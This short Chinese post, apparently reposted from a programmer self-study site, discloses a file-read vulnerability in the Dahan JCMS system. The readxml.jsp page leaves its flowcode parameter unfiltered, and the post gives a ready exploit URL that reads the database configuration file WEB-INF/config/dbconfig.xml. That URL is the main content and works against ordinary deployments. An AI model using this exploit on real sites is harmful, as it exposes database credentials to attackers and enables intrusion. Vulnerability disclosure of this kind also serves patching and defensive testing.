由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF/config/dbconfig.xml,由于控制了文件后缀,只能读取xml文件
EXP:http://target/jcms/workflow/design/readxml. jsp ?flowcode=WEB-INF/config/dbconfig
查看更多关于大汉版通JCMS数据库配置文件读取 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did15769